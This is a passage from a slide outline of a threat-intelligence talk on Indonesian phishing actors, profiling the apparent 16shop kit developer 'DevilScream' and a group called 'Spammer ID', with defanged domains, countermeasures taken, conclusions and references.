    • A developer of an infamous phishing kit, "16shop".
  • 39. DevilScream (Riswanda / devilscream / Z1coder)
  • 40. DevilScream: Total: 768 domains (2019/03)
  • 41. DevilScream
    • GitHub as a C2 (since 16shop v2)
  • 42. DevilScream
    • Attribution by Phishing AI. Source: https://twitter.com/PhishingAi/status/1011688773610979328/
  • 43. CHASING INDONESIAN ACTORS: SPAMMER ID
  • 44. Spammer ID: RSJKINGDOM's profile picture on Kongknow
  • 45. Spammer ID
  • 46. Spammer ID
    • Spammer ID runs various services:
      • arakatestore[.]com: HTML to PDF Converter; Encrypt text with HTML Hidden Characters
      • carder[.]io: BIN checker
      • spmr[.]us: URL shortener
      • spammer[.]me: OCR reader, Priv8 tools, etc.
  • 47. COUNTERMEASURES WE'VE TAKEN
  • 48. Countermeasures We've Taken
    • Reporting phishing websites:
      • To Google Safe Browsing
      • To hosting providers
    • Sharing a report with LEAs & CSIRT/CERTs.
  • 49. CONCLUSIONS
  • 50. Conclusions
    • You can get phishing kits by leveraging OSINT.
    • The cloaking function in phishing kits makes analysis difficult.
      • But you can bypass it by knowing how it works.
    • You can take practical countermeasures against phishing attacks by analyzing phishing kits.
  • 51. ANY QUESTIONS?
  • 52. References
    • DeepEnd Research: Indonesian Spam Communities
      • http://www.deependresearch.org/2018/09/indonesian-spam-communities.html
    • NetSecOps: Analysis of Phishing mail. Drone bought from Apple
      • http://netsecops.info/bought-a-drone-from-apple-really/